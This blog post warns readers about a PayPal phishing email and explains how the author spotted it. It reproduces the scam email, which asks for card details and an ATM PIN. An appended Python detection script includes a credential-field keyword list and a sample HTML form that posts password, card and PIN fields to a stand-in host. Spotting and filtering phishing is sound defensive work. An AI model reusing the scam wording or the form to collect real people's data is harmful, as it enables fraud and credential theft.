John C. Kirk (johnckirk) wrote,

PayPal hoax

Hmm, I wasn't intending to post another entry this soon, but I just got a rather worrying email. It appears to be from PayPal, but I think it's a hoax, so be very cautious if you receive something similar.

Key things that made me suspicious:

  • They are asking for my password, which PayPal say they will never do.

  • They shouldn't need my credit card number again, and giving a random person the number/expiration date would make it very easy for them to commit fraud (they could get my street address by logging into PayPal as me, once they have my email address and password).

  • They definitely shouldn't need my ATM PIN!

  • Although the email is dated tomorrow (Wed 4th June 2003), it says that it expires May 31, 2003.

  • General point - if I'm going to enter stuff like this, I'd rather do it at the website, than typing into an email form.

Once I got suspicious, I checked the source code of the message - although it appears to be from (according to the "from" email address), the form is set up to send its data to And even if they are a registered subcontractor, a file called "boyz.php" doesn't sound very official to me. And finally, this email was sent to my old Demon address, rather than my new address (which is actually registered with PayPal, so the one that they'll use to contact me) - presumably this means that it's a wide scale thing, rather than anything that's specifically targeted at PayPal users.

Anyway, I've notified PayPal of this, and they should get back to me in a couple of days to confirm/deny.

So, assuming that I'm right, it's good to know that I'm getting less gullible as time goes by. In this case, I think it helps that we covered social engineering as part of the Cryptography/Information Security course, which I was revising a couple of weeks ago.

Oh, and one last thing - I've included the entire email below (behind the cut tags), so that you can see it for yourselves. This should be obvious, but please don't enter your details and click the "log in" button!


Dear PayPal Customer


This e-mail is the notification of recent innovations taken by PayPal to detect inactive customers and non-functioning mailboxes.

The inactive customers are subject to restriction and removal in the next
3 months.

Please confirm your email address and and Credit Card info
number by logging in to your PayPal account
using the form below:


Email Address:
Full Name #: 
Credit Card #: 
Exp.Date(mm/yyyy) #: 
ATM PIN (For Bank Verification) #: 

This notification expires May 31, 2003

Thanks for using PayPal!
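The source-code check described in the post (comparing the "from" address with where the form sends its data, and noting which fields it asks for) can be automated. The sketch below is an added example, not part of the original post: the domains `paypal.example` and `collector.example`, the field names and the keyword list are constructed assumptions; only the file name "boyz.php" comes from the post.

```python
from email import message_from_string
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Substrings of field names that no mail form should collect (assumed list).
SENSITIVE = ("pass", "card", "pin", "cvv", "exp")

class FormScanner(HTMLParser):
    """Collect each form's action URL and the names of its input fields."""
    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "fields": []})
        elif tag == "input" and self.forms:
            self.forms[-1]["fields"].append((a.get("name") or "").lower())

def audit(raw):
    """Return findings for every HTML form embedded in a raw email message."""
    msg = message_from_string(raw)
    sender = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        scanner = FormScanner()
        scanner.feed(part.get_payload(decode=True).decode("utf-8", "replace"))
        for form in scanner.forms:
            host = (urlparse(form["action"]).hostname or "").lower()
            # The form should post to the sender's own domain or a subdomain.
            if host and host != sender and not host.endswith("." + sender):
                findings.append(f"form posts to {host}, not {sender}")
            asked = [f for f in form["fields"] if any(k in f for k in SENSITIVE)]
            if asked:
                findings.append("asks for: " + ", ".join(asked))
    return findings

# Constructed sample message; every address and host here is a placeholder.
SAMPLE = """\
From: PayPal <service@paypal.example>
Content-Type: text/html; charset="us-ascii"

<form action="http://collector.example/boyz.php" method="post">
<input name="email"><input name="password" type="password">
<input name="card_number"><input name="exp_date"><input name="atm_pin"></form>
"""
```

The "from" header is itself trivially forged, so a matching domain proves nothing; a mismatch or a request for credentials is the useful signal.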

Tags: computers, paypal, scam, security
